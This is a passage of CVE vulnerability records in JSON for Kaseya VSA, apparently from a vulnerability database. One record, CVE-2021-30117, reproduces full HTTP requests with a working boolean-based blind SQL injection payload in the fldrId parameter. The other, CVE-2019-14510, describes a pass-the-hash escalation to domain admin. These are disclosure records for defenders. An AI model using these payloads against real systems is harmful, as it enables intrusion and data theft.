]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "MISC",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
]
},
"solution": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30117",
"datePublished": "2021-07-09T13:18:21",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-14510 (GCVE-0-2019-14510)
Vulnerability from nvd – Published: 2019-10-11 11:44 – Updated: 2024-08-05 00:19
VLAI?
Summary
An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T00:19:41.084Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.kaseya.com/products/vsa/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-11T11:44:18",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.kaseya.com/products/vsa/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-14510",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.kaseya.com/products/vsa/",
"refsource": "MISC",
"url": "https://www.kaseya.com/products/vsa/"
},
{
"name": "http://community.kaseya.com/xsp/f/355.aspx",
"refsource": "MISC",
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"name": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/",
"refsource": "MISC",
"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"name": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/",
"refsource": "MISC",
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"name": "http://community.kaseya.com/xsp/f/355/t/24675.aspx",
"refsource": "MISC",
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-14510",
"datePublished": "2019-10-11T11:44:18",
"dateReserved": "2019-08-01T00:00:00",
"dateUpdated": "2024-08-05T00:19:41.084Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}